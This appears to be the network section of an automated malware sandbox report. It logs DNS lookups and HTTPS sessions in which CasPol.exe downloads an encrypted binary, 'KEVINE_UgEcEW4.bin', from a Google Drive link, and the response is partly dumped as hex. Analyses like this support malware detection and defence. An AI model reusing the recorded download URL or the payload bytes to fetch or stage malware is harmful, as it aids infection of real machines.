                              Nov 23, 2021 12:22:36.150505066 CET44349808142.250.186.97192.168.11.20
                              Nov 23, 2021 12:22:36.150556087 CET49808443192.168.11.20142.250.186.97
                              Nov 23, 2021 12:22:36.150595903 CET44349808142.250.186.97192.168.11.20
                              Nov 23, 2021 12:22:36.150722980 CET49808443192.168.11.20142.250.186.97
                              Nov 23, 2021 12:22:36.150800943 CET49808443192.168.11.20142.250.186.97
                              Nov 23, 2021 12:22:36.151048899 CET44349808142.250.186.97192.168.11.20
                              Nov 23, 2021 12:22:36.151365042 CET49808443192.168.11.20142.250.186.97
                              Nov 23, 2021 12:22:36.151432991 CET44349808142.250.186.97192.168.11.20
                              Nov 23, 2021 12:22:36.151659012 CET49808443192.168.11.20142.250.186.97
                              Nov 23, 2021 12:22:36.151729107 CET44349808142.250.186.97192.168.11.20
                              Nov 23, 2021 12:22:36.151917934 CET49808443192.168.11.20142.250.186.97
                              Nov 23, 2021 12:22:36.151959896 CET44349808142.250.186.97192.168.11.20
                              Nov 23, 2021 12:22:36.152148008 CET49808443192.168.11.20142.250.186.97
                              Nov 23, 2021 12:22:36.152445078 CET44349808142.250.186.97192.168.11.20
                              Nov 23, 2021 12:22:36.152681112 CET49808443192.168.11.20142.250.186.97
                              Nov 23, 2021 12:22:36.152739048 CET44349808142.250.186.97192.168.11.20
                              Nov 23, 2021 12:22:36.152921915 CET49808443192.168.11.20142.250.186.97
                              Nov 23, 2021 12:22:36.153153896 CET44349808142.250.186.97192.168.11.20
                              Nov 23, 2021 12:22:36.153325081 CET49808443192.168.11.20142.250.186.97
                              Nov 23, 2021 12:22:36.153367043 CET44349808142.250.186.97192.168.11.20
                              Nov 23, 2021 12:22:36.153564930 CET49808443192.168.11.20142.250.186.97
                              Nov 23, 2021 12:22:36.153855085 CET44349808142.250.186.97192.168.11.20
                              Nov 23, 2021 12:22:36.154006958 CET49808443192.168.11.20142.250.186.97
                              Nov 23, 2021 12:22:36.154046059 CET44349808142.250.186.97192.168.11.20
                              Nov 23, 2021 12:22:36.154263973 CET49808443192.168.11.20142.250.186.97
                              Nov 23, 2021 12:22:36.154525995 CET44349808142.250.186.97192.168.11.20
                              Nov 23, 2021 12:22:36.154695988 CET49808443192.168.11.20142.250.186.97
                              Nov 23, 2021 12:22:36.154737949 CET44349808142.250.186.97192.168.11.20
                              Nov 23, 2021 12:22:36.154936075 CET49808443192.168.11.20142.250.186.97
                              Nov 23, 2021 12:22:36.155302048 CET44349808142.250.186.97192.168.11.20
                              Nov 23, 2021 12:22:36.155555964 CET49808443192.168.11.20142.250.186.97
                              Nov 23, 2021 12:22:36.155611992 CET44349808142.250.186.97192.168.11.20
                              Nov 23, 2021 12:22:36.155832052 CET49808443192.168.11.20142.250.186.97
                              Nov 23, 2021 12:22:36.156081915 CET44349808142.250.186.97192.168.11.20
                              Nov 23, 2021 12:22:36.156239986 CET49808443192.168.11.20142.250.186.97
                              Nov 23, 2021 12:22:36.156281948 CET44349808142.250.186.97192.168.11.20
                              Nov 23, 2021 12:22:36.156441927 CET49808443192.168.11.20142.250.186.97
                              Nov 23, 2021 12:22:36.156699896 CET44349808142.250.186.97192.168.11.20
                              Nov 23, 2021 12:22:36.156860113 CET49808443192.168.11.20142.250.186.97
                              Nov 23, 2021 12:22:36.156894922 CET44349808142.250.186.97192.168.11.20

                              UDP Packets

                              TimestampSource PortDest PortSource IPDest IP
                              Nov 23, 2021 12:22:34.887140989 CET5269353192.168.11.201.1.1.1
                              Nov 23, 2021 12:22:34.897262096 CET53526931.1.1.1192.168.11.20
                              Nov 23, 2021 12:22:35.756014109 CET6364853192.168.11.201.1.1.1
                              Nov 23, 2021 12:22:35.793828964 CET53636481.1.1.1192.168.11.20

                              DNS Queries

                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                              Nov 23, 2021 12:22:34.887140989 CET192.168.11.201.1.1.10xac21Standard query (0)drive.google.comA (IP address)IN (0x0001)
                              Nov 23, 2021 12:22:35.756014109 CET192.168.11.201.1.1.10x2fb9Standard query (0)doc-14-48-docs.googleusercontent.comA (IP address)IN (0x0001)

                              DNS Answers

                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                              Nov 23, 2021 12:22:34.897262096 CET1.1.1.1192.168.11.200xac21No error (0)drive.google.com142.250.185.142A (IP address)IN (0x0001)
                              Nov 23, 2021 12:22:35.793828964 CET1.1.1.1192.168.11.200x2fb9No error (0)doc-14-48-docs.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)
                              Nov 23, 2021 12:22:35.793828964 CET1.1.1.1192.168.11.200x2fb9No error (0)googlehosted.l.googleusercontent.com142.250.186.97A (IP address)IN (0x0001)

                              HTTP Request Dependency Graph

                              • drive.google.com
                              • doc-14-48-docs.googleusercontent.com

                              HTTPS Proxied Packets

                              Session IDSource IPSource PortDestination IPDestination PortProcess
                              0192.168.11.2049807142.250.185.142443C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                              TimestampkBytes transferredDirectionData
                              2021-11-23 11:22:35 UTC0OUTGET /uc?export=download&id=1BlKZMF9MVJAQ4upDwXLe5aNIoHz7szu8 HTTP/1.1
                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                              Host: drive.google.com
                              Cache-Control: no-cache
                              2021-11-23 11:22:35 UTC0INHTTP/1.1 302 Moved Temporarily
                              Content-Type: text/html; charset=UTF-8
                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                              Pragma: no-cache
                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                              Date: Tue, 23 Nov 2021 11:22:35 GMT
                              Location: https://doc-14-48-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/0g7u5k11ld4lu4kfcj18c8hho068lo7a/1637666550000/11605847516605788748/*/1BlKZMF9MVJAQ4upDwXLe5aNIoHz7szu8?e=download
                              P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                              Report-To: {"group":"coop_gse_l9ocaq","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gse_l9ocaq"}]}
                              Content-Security-Policy: script-src 'nonce-Aje1oZkfF7lQQBzP9+JwLA' 'unsafe-inline' 'strict-dynamic' https: http: 'unsafe-eval';object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/drive-explorer/
                              Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_gse_l9ocaq"
                              X-Content-Type-Options: nosniff
                              X-Frame-Options: SAMEORIGIN
                              X-XSS-Protection: 1; mode=block
                              Server: GSE
                              Set-Cookie: NID=511=vWNjg2F_eSEW9HSPZT0khae6gI7tYDrwBXM--OadY76cPh1ldbrBXiQEF_uGsNUmHJfT0EK9ZvHeJRyWojk-e_kAyarJOjNAofCfNTKz9wfcaTWuAbi3hX6qLgXsCVsFPR-5WrO4YQn1XFgkiHW44xYxpoqurfYj4I-JJpWZhZY; expires=Wed, 25-May-2022 11:22:35 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none
                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                              Accept-Ranges: none
                              Vary: Accept-Encoding
                              Connection: close
                              Transfer-Encoding: chunked
                              2021-11-23 11:22:35 UTC1INData Raw: 31 38 34 0d 0a 3c 48 54 4d 4c 3e 0a 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 4d 6f 76 65 64 20 54 65 6d 70 6f 72 61 72 69 6c 79 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 46 46 46 46 46 46 22 20 54 45 58 54 3d 22 23 30 30 30 30 30 30 22 3e 0a 3c 48 31 3e 4d 6f 76 65 64 20 54 65 6d 70 6f 72 61 72 69 6c 79 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 64 6f 63 2d 31 34 2d 34 38 2d 64 6f 63 73 2e 67 6f 6f 67 6c 65 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 2f 64 6f 63 73 2f 73 65 63 75 72 65 73 63 2f 68 61 30 72 6f 39 33 37 67 63 75 63 37 6c 37 64 65 66 66 6b 73 75 6c 68 67 35 68 37 6d 62 70 31 2f 30 67 37 75
                              Data Ascii: 184<HTML><HEAD><TITLE>Moved Temporarily</TITLE></HEAD><BODY BGCOLOR="#FFFFFF" TEXT="#000000"><H1>Moved Temporarily</H1>The document has moved <A HREF="https://doc-14-48-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/0g7u
                              2021-11-23 11:22:35 UTC2INData Raw: 30 0d 0a 0d 0a
                              Data Ascii: 0


                              Session IDSource IPSource PortDestination IPDestination PortProcess
                              1192.168.11.2049808142.250.186.97443C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                              TimestampkBytes transferredDirectionData
                              2021-11-23 11:22:35 UTC2OUTGET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/0g7u5k11ld4lu4kfcj18c8hho068lo7a/1637666550000/11605847516605788748/*/1BlKZMF9MVJAQ4upDwXLe5aNIoHz7szu8?e=download HTTP/1.1
                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                              Cache-Control: no-cache
                              Host: doc-14-48-docs.googleusercontent.com
                              Connection: Keep-Alive
                              2021-11-23 11:22:36 UTC2INHTTP/1.1 200 OK
                              X-GUploader-UploadID: ADPycdtbzQL5L-3IpnPq2h8j2g5CQ2iYqmsNomEN8b4CqZY8I5SUPh9PobYttskRrxxiNitwl_jHOo0Yg5Q2j8ADiUewlNY0VQ
                              Access-Control-Allow-Origin: *
                              Access-Control-Allow-Credentials: false
                              Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, x-chrome-connected, X-ClientDetails, X-Client-Version, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogApps-Allowed-Domains, X-Goog-AdX-Buyer-Impersonation, X-Goog-Api-Client, X-Goog-Visibilities, X-Goog-AuthUser, x-goog-ext-124712974-jspb, x-goog-ext-251363160-jspb, x-goog-ext-259736195-jspb, X-Goog-PageId, X-Goog-Encode-Response-If-Executable, X-Goog-Correlation-Id, X-Goog-Request-Info, X-Goog-Request-Reason, X-Goog-Experiments, x-goog-iam-authority-selector, x-goog-iam-authorization-token, X-Goog-Spatula, X-Goog-Travel-Bgr, X-Goog-Travel-Settings, X-Goog-Upload-Command, X-Goog-Upload-Content-Disposition, X-Goog-Upload-Content-Length, X-Goog-Upload-Content-Type, X-Goog-Upload-File-Name, X-Goog-Upload-Header-Content-Encoding, X-Goog-Upload-Header-Content-Length, X-Goog-Upload-Header-Content-Type, X-Goog-Upload-Header-Transfer-Encoding, X-Goog-Upload-Offset, X-Goog-Upload-Protocol, x-goog-user-project, X-Goog-Visitor-Id, X-Goog-FieldMask, X-Google-Project-Override, X-Goog-Api-Key, X-HTTP-Method-Override, X-JavaScript-User-Agent, X-Pan-Versionid, X-Proxied-User-IP, X-Origin, X-Referer, X-Requested-With, X-Stadia-Client-Context, X-Upload-Content-Length, X-Upload-Content-Type, X-Use-HTTP-Status-Code-Override, X-Ios-Bundle-Identifier, X-Android-Package, X-Ariane-Xsrf-Token, X-YouTube-VVT, X-YouTube-Page-CL, X-YouTube-Page-Timestamp, X-Compass-Routing-Destination, x-framework-xsrf-token, X-Goog-Meeting-ABR, X-Goog-Meeting-Botguardid, X-Goog-Meeting-ClientInfo, X-Goog-Meeting-ClientVersion, X-Goog-Meeting-Debugid, X-Goog-Meeting-Identifier, X-Goog-Meeting-RtcClient, X-Goog-Meeting-StartSource, X-Goog-Meeting-Token, X-Goog-Meeting-ViewerInfo, X-Client-Data, x-sdm-id-token, X-Sfdc-Authorization, MIME-Version, Content-Transfer-Encoding, X-Earth-Engine-App-ID-Token, X-Earth-Engine-Computation-Profile, X-Earth-Engine-Computation-Profiling, X-Play-Console-Experiments-Override, X-Play-Console-Session-Id, x-alkali-account-key, x-alkali-application-key, x-alkali-auth-apps-namespace, x-alkali-auth-entities-namespace, x-alkali-auth-entity, x-alkali-client-locale, EES-S7E-MODE, cast-device-capabilities, X-Server-Timeout
                              Access-Control-Allow-Methods: GET,OPTIONS
                              Content-Type: application/octet-stream
                              Content-Disposition: attachment;filename="KEVINE_UgEcEW4.bin";filename*=UTF-8''KEVINE_UgEcEW4.bin
                              Content-Length: 221760
                              Date: Tue, 23 Nov 2021 11:22:36 GMT
                              Expires: Tue, 23 Nov 2021 11:22:36 GMT
                              Cache-Control: private, max-age=0
                              X-Goog-Hash: crc32c=eYbL4g==
                              Server: UploadServer
                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                              Connection: close
                              2021-11-23 11:22:36 UTC6INData Raw: b7 ac c3 73 e3 6f 67 b3 e4 90 f7 cd 5c 66 52 02 69 40 4a 1b 0f 02 5e 9b ce aa 8a ca 09 71 77 57 12 9b db 1b e2 6e a8 7f c8 0f d4 96 cc 2a 1f 3e 90 e8 06 46 ac 13 fe fb 80 f5 19 c3 73 76 a8 d4 5b 5c 97 81 9b 9d 29 8b b0 38 c8 4f 2d cf a4 6c ca c9 8a e0 95 27 46 65 06 d4 53 fa 19 33 1d 07 9d bd f6 32 ed 44 ed 4d 37 52 08 36 65 c2 9c b9 9d 1f fd 2a 68 f9 bb fd ce de 99 9f 1a 21 0b 32 a5 9c ab 93 78 c4 6d 6e ea 59 be 54 bf c1 59 3a a9 5c 27 fc 30 3f 9e 95 d2 cb 6f df 65 11 23 7d 4f 12 a6 a0 3f 19 9f d4 f2 b6 73 a0 d8 0a 18 b0 35 d6 8a 4f 4d 95 d1 b6 1d 03 98 0d f0 98 0b 25 cb a0 0a ad 6d e0 83 2e b8 4a 5b 50 0d 70 5c 41 69 3a 3f 96 5a 41 fd e3 34 62 c3 f1 8d 03 ef 26 36 62 8f 81 cd 42 7e c6 27 db 6c 46 0d e0 b9 97 20 fd 30 7d a8 ba b5 d4 2f fe 39 56 e1 85 5a
                              Data Ascii: sog\fRi@J^qwWn*>Fsv[\)8O-l'FeS32DM7R6e*h!2xmnYTY:\'0?oe#}O?s5OM%m.J[Pp\Ai:?ZA4b&6bB~'lF 0}/9VZ
                              2021-11-23 11:22:36 UTC9INData Raw: 7f 68 11 9e 73 96 1d 26 dd 2d 01 2c 74 7d 53 c7 3c 35 96 ba e1 0c 56 8f a8 1a e0 5a 2d 3c 53 2c cc 44 e3 1c c8 bd 8d 6d 4d 40 04 37 b5 c5 16 8d e3 60 2a 04 50 1b e0 64 3c b8 f5 a7 32 b2 11 29 96 82 59 97 0e 8d 1f b5 b1 e8 cf 57 a9 46 ff 66 05 8d 51 a2 cd de 0f 46 26 c0 64 88 b0 18 9e 17 ca 08 f9 60 1d 3e 72 6a 5f 4b 6b 9a f2 d4 fc 58 30 cc 42 f4 ec 57 a0 b4 52 b3 92 0b 2f 47 8a c9 97 3f b4 ae 61 1b 09 5e a7 d7 8e be 80 9a a9 a6 09 08 eb b1 ec 1b 11 19 30 fa f3 9c 58 68 64 ab 49 54 e2 9b 76 0e 65 76 a8 0e b5 12 d7 81 81 75 38 f2 f1 d3 32 2c 3f 25 bb 28 2b 8e ca 49 ca 32 32 7c 2b 59 05 d7 22 48 ac f3 ef 83 fc da 47 dd 8d 07 a5 2c 36 de eb 2c 51 70 cc 15 03 f4 7e 11 36 48 7e cc 08 b4 a2 c6 ed b6 62 bb f5 a4 fd 64 be e1 0a 11 68 61 c6 a2 72 f5 c0 e9 2c e5 d4
                              Data Ascii: hs&-,t}S<5VZ-<S,DmM@7`*Pd<2)YWFfQF&d`>rj_KkX0BWR/G?a^0XhdITvevu82,?%(+I22|+Y"HG,6,Qp~6H~bdhar,
                              2021-11-23 11:22:36 UTC13INData Raw: 89 5a c8 17 77 b2 d6 f0 66 6c 82 32 bb 6f 8c ca e2 87 86 47 4a 5b 73 04 9c 80 ce 99 82 61 c4 c6 6a 51 7a 1e c4 db f0 d9 00 51 29 e8 c9 7c fc c4 96 88 18 3a e7 cc 9e d6 51 83 91 6f ec f3 aa c3 89 ff 08 de 03 d9 97 e6 59 79 2f 5c 78 05 30 16 63 e9 f9 00 ff 81 9d 29 8f 9c 1c c8 4f d8 1a a4 6c 72 da ba e2 95 2f 47 65 46 dc 53 fa 08 25 16 2c 86 bd f1 25 13 45 c1 4f 2f 59 08 31 73 3c 9d 95 9f 08 f6 2a 6f e1 45 fc e2 dc b2 9d b1 c2 23 47 a9 83 17 9f 50 eb 64 a3 c1 c9 c9 1a 72 e6 25 c9 c0 2f 0d 93 48 dc a6 e7 b3 a7 67 27 04 7f 47 0d 31 be 9b c5 1f 6a c2 21 d2 df 17 a8 eb 47 4b 96 70 22 ee 2a 69 b0 a4 be 39 05 b0 96 f0 98 01 0d be e5 0a a7 09 7a 80 2e a0 9b 91 33 0d 76 74 da 69 3a 35 be 9c 41 ff e8 17 f8 c8 f1 87 44 e6 aa 69 6a 8f 80 e5 d9 7e c6 13 85 16 44 0d c6
                              Data Ascii: Zwfl2oGJ[sajQzQ)|:QoYy/\x0c)Olr/GeFS%,%EO/Y1s<*oE#GPdr%/Hg'G1j!GKp"*i9z.3vti:5ADij~D
                              2021-11-23 11:22:36 UTC17INData Raw: bc 6e 25 41 0c 77 be 26 60 37 13 68 af 75 a9 90 b2 7f 58 09 ba 5d 5c 72 71 db 42 cd f0 aa 7d 85 e4 1f 15 ce ed e1 06 4f 73 a8 0c e2 5a 21 e8 8d 2f ec 5b 5f 1c c2 93 cc a9 4d 46 04 c1 82 e0 3e b0 3d 60 26 3d 71 33 d8 65 14 b2 2b a5 23 c3 39 d5 19 82 55 f8 c8 8d 1f bd 6f be ea 3d 05 46 f5 6c 16 af 79 9a cd de 05 35 8b d1 7e ba 62 18 9f 0a 95 cb f9 77 16 e0 7d 5a 77 7c 7a 98 d0 8e df 70 02 b8 71 fe 32 56 bb ba 52 03 92 0b 23 47 07 c9 97 3f 6c b6 2b 7f 3e 5e ad db bd ba e6 a2 a9 c9 4e d6 eb aa e2 24 b1 57 30 fc 96 5c 47 5a 01 3a 46 71 c0 aa 5e 42 6d 65 8b 49 dd 12 d7 81 59 5d 64 f8 d9 1e 5d 7d 39 4a 77 2e 44 d6 14 46 e5 11 02 08 11 53 16 f0 65 23 ac f3 ef 75 b2 c9 4f f3 51 2f 8b 2a 42 da fd 6c c1 1f 0a 15 04 91 f4 1e 13 6a 45 cb 67 e6 b1 e1 cf 39 75 6d 72 51
                              Data Ascii: n%Aw&`7huX]\rqB}OsZ!/[_MF>=`&=q3e+#9Uo=Fly5~bw}Zw|zpq2VR#G?l+>^N$W0\GZ:Fq^BmeIY]d]}9Jw.DFSe#uOQ/*BljEg9umrQ
                              2021-11-23 11:22:36 UTC18INData Raw: be 5d 34 25 f2 e1 e4 2c ae 6d 4b 77 00 b3 78 d6 91 ec 0c c5 7d 8a 88 fe ad a4 12 59 3c d2 08 fd 94 79 cf 07 81 92 84 17 e6 b5 38 c8 31 dc 30 a4 68 65 fa b7 c8 55 25 46 63 6e fe 53 fa 1f 1b 35 07 9d bb e7 35 82 96 ed 4d 3d 7a 2c 36 65 c8 88 af b5 2d fd 2a 6e df 66 c7 cf de 99 ba b2 16 0b 32 a1 90 2c 89 6b 77 4c 9b cb e1 b5 c5 57 e1 0d 52 be 21 07 8c 46 48 b9 7b b3 a6 4f a7 89 6a 4d 12 3a 21 84 d4 5f 7d c2 75 d0 df 1b 22 8d 05 5c ee 4f b9 ee 2e 4b dd de bc 3f 2b cf 0f f0 9e 64 5d 9b e5 00 0f 30 a1 98 06 f2 b1 d4 37 af 61 1c 58 41 43 3f 96 b0 52 bd f0 7d 1d de f1 8d 5f c4 5c 36 6a 85 23 dc 02 64 ee 7f af 6f 40 af d1 f9 bf 5b fd 30 77 80 dd f7 d4 29 f6 11 56 e1 81 4b a2 92 d4 cf fd 40 33 48 eb 63 17 31 ef ea 9b 05 7e 07 50 5b 3e 6e a5 bf d5 1a c5 3c 54 e1 f4
                              Data Ascii: ]4%,mKwx}Y<y810heU%FcnS55M=z,6e-*nf2,kwLWR!FH{OjM:!_}u"\O.K?+d]07aXAC?R}_\6j#do@[0w)VK@3Hc1~P[>n<T
                              2021-11-23 11:22:36 UTC19INData Raw: 92 b0 18 9f 2c f3 0d f9 79 1c 3e 72 51 56 4b 7a 97 da 9d fc 42 3a b8 70 f4 ec 56 aa 8f 73 f9 92 05 25 28 c1 82 9e 35 b2 b6 0e 57 09 44 ad d1 af 9e ce 9a a9 93 4d 08 eb b5 ea 0c 7e 3f 39 fa f9 95 47 5a 0b fe 49 54 e9 9d 5e 42 67 01 a7 61 e5 1c d7 8b 87 d8 7c f0 f1 da 5d 7d 3f 3f b1 2e 45 dc ca 49 c0 ad 3c 08 11 57 05 d6 4d b9 a5 f3 e5 a4 b2 d8 47 c1 9b 2f 8a 2c 36 d4 fd dd d3 70 cc 1b 04 9b 2a ae 3f 42 72 c4 67 ec a2 dc e7 01 74 6d 78 8f fd aa b6 ec 09 07 70 12 9f 7e 7b ff d3 e2 3b f6 d1 e1 b5 f9 66 b4 71 74 8c e1 75 9e 85 b6 57 3e 60 85 c8 f0 91 63 02 09 ea b9 1e c0 e2 f1 1e ae 79 43 b5 f3 2c e8 8e ba cc 95 52 1a 37 3a b0 5c a6 3c 68 66 c0 00 33 1f 2a 26 4c 2b ab d2 c4 ce 2a c4 11 57 8c 6c 08 fb 0b b5 99 26 48 95 6a 4a 0e 74 b6 0d 9c 06 b4 b4 30 d7 68 3e
                              Data Ascii: ,y>rQVKzB:pVs%(5WDM~?9GZIT^Bga|]}??.EI<WMG/,6p*?Brgtmxp~{;fqtuW>`cyC,R7:\<hf3*&L+*Wl&HjJt0h>
                              2021-11-23 11:22:36 UTC20INData Raw: 7e a8 cb e6 a4 e6 73 cc 05 7a ee 2d 07 8a 68 4c f2 e7 b4 b1 b1 bd 28 7d 55 19 3b 35 d9 3b 1e 47 e1 b8 c4 dc 72 6f 9c 45 41 ba 46 b2 ee 2d 75 66 dd 90 3b 14 93 0d f7 86 f5 24 b7 e7 21 a8 19 9d 7f d1 55 b5 fe 31 0d 70 4f 71 6b 3a a3 96 ba 41 d8 e2 3f 72 de e2 89 63 6f 26 36 6a 8f 90 c9 58 80 c7 35 a5 57 39 0d c0 b9 8c 33 f9 30 6c ac ad 0b d5 03 dd 21 45 e5 87 4b a1 e4 f8 ce d1 4f 0d 94 f3 70 15 19 d0 ec 86 fd 10 53 55 4c 1e 58 de b9 d5 0d e9 58 aa e0 d2 05 a1 af 5f 48 8c f4 bb 05 a1 7f bb 76 83 91 04 d6 dc 92 7d 37 3d ad 34 e7 49 91 1b b2 18 1d 3c 96 bc e6 e5 f5 19 34 f7 13 db 26 41 83 4e a6 af 1d 48 41 33 47 7f 7e 09 a9 bd 37 41 b0 b2 53 5f 0e 6e 72 c8 e2 dd db cd 7d 28 7d ce 79 25 88 de a2 f0 ff 95 b5 72 e1 9c c9 fd 73 db cc 67 69 a7 04 3c 8b 23 fd 94 08
                              Data Ascii: ~sz-hL(}U;5;GroEAF-uf;$!U1pOqk:A?rco&6jX5W930l!EKOpSULXX_Hv}7=4I<4&ANHA3G~7AS_nr}(}y%rsgi<#
                              2021-11-23 11:22:36 UTC22INData Raw: 3d 5e 02 cc 4b b9 b3 e3 e9 ab ba c7 4b 25 9a 03 80 2b 21 aa e4 6c da 74 6e 0a 09 97 2a 19 29 53 8c ca 4b e2 a5 ee 9c 01 75 67 f8 87 fd 64 bb f3 1b 05 70 1a 88 5c 73 d3 d1 f5 37 f6 d9 e5 4b f8 4b a3 0f 7c 8c 0a 78 e0 9d b8 57 3a 0f 82 c1 f0 9b 56 1c f6 15 5c 01 c9 ef f1 16 b1 70 b5 be df 3b 98 86 ba cc 87 26 02 37 35 b4 74 82 26 68 6c 41 08 33 1f 2e 1c 4c 27 ab d4 db c3 d4 f6 37 5c 8b 7b 20 11 09 af 9f 84 56 9b 66 4a 06 20 42 0c b0 0a a3 b8 30 8f 7d 2c 88 05 3a 64 fb b7 46 90 73 bb c1 6f f9 a3 ce 3d b1 f0 79 93 21 ce 8b c2 b6 db 87 61 e4 00 5b 36 0e 2f 0a 51 01 78 65 7c 53 51 49 dd d9 7b ff 0f 3b 11 7a 26 09 5b e0 20 44 49 1e 23 6c da d6 a1 56 c1 86 24 c2 d4 f1 6d 1e e1 38 a8 6a a4 cf e6 98 83 91 4b 76 7e 07 8a 02 51 33 38 72 c7 72 7e 50 6d 75 c5 cb f4 cc
                              Data Ascii: =^KK%+!ltn*)SKugdp\s7KK|xW:V\p;&75t&hlA3.L'7\{ VfJ B0},:dFso=y!a[6/Qxe|SQI{;z&[ DI#lV$m8jKv~Q38rr~Pmu
                              2021-11-23 11:22:36 UTC23INData Raw: d6 aa 93 18 72 30 7d a8 ba e4 d0 36 20 38 7a ee 91 24 80 fd 06 cb 73 fd 0c 42 e4 6f 0b 0a c5 e8 8a 07 0d 81 51 77 31 51 e7 a0 c6 18 ed 51 50 fb 00 0d a5 99 74 22 9d ea a6 16 b4 7b b2 8c 9e 43 16 84 ef 95 12 5e 15 52 3e e5 2c 0e 76 b2 12 3b 1a 92 bc e6 e5 f5 19 34 f7 13 db 3a 4e e4 d3 ac b3 04 32 64 22 43 6d 88 92 93 96 0e 52 b4 b8 54 a5 11 bc 5b f8 f3 f2 de e4 01 c0 7c 30 5d 31 46 c1 ae f9 60 26 91 59 f6 9a d1 da 64 df 4b 74 6d ba d2 3d a7 30 fe 48 32 de 97 0b 43 6c ec 98 25 57 80 17 d8 2b 2a 77 87 56 99 94 b8 22 5f 18 b2 5a 9f 72 60 f5 65 0b f0 ac f7 7b eb 3a 39 87 c9 e1 0c 58 7f be 4a c1 5a 2b 32 9a 0d fc 0d c6 1c c2 91 2d d8 5b 77 22 37 c7 c5 16 81 10 65 f1 7d 57 1b e0 4e 0a c6 d6 a5 32 cf 09 0c 0f fc 76 97 0e 89 91 00 a7 80 c3 3d 79 46 f5 60 28 88 8c
                              Data Ascii: r0}6 8z$sBoQw1QQPt"{C^R>,v;4:N2d"CmRT[|0]1F`&YdKtm=0H2Cl%W+*wV"_Zr`e{:9XJZ+2-[w"7e}WN2v=yF`(
                              2021-11-23 11:22:36 UTC24INData Raw: 1e 1f 3f b3 5c a0 0e 4c 66 c1 0a b3 17 2a 03 42 f6 a2 df c4 ce 28 e8 6c 64 95 1d 00 fb 0b ab b1 2d 4a 95 6c 62 2a 36 bc 07 1c 00 b4 b4 34 5a 89 3c 76 04 14 79 a8 81 67 9e 85 44 3e 41 ca 9f c9 3d 7c d8 5d 93 0b c4 0b db b4 f3 7c bc 29 08 34 02 0c 30 79 0d 2d 06 6d 76 59 88 d2 d0 da 7b dc 0f 28 11 7a 26 85 51 c8 df 40 94 bb 32 68 fa d4 ba 2c f2 12 21 ca d4 f0 64 e6 93 3b a8 6d a4 ff e6 98 83 39 43 77 7e 09 5e 1d e4 eb 80 63 dd 1f 46 58 17 12 c4 ca f0 ee 19 ac 28 c2 ea 26 e1 c4 9c 0c 3c 25 f8 df 50 a1 53 92 95 7b 0d d2 b5 d9 e0 e4 0c de 16 f5 d2 fc a7 7e 2b 7a 53 00 02 7d 96 16 06 03 5c cd 9f 29 8b 9c 3c c8 4f d4 5f ad 6d 72 c3 e5 eb 94 27 4c 4d 42 d4 53 fc 76 3a 1c 07 97 d2 fc 33 ed 4e fb b3 36 0d 0a 29 77 3c 9d af 63 1e a2 28 48 5d bb fd ce 20 98 89 64 20
                              Data Ascii: ?\Lf*B(ld-Jlb*64Z<vygD>A=|]|)40y-mvY{(z&Q@2h,!d;m9Cw~^cFX(&<%PS{~+zS}\)<O_mr'LMBSv:3N6)w<c(H] d
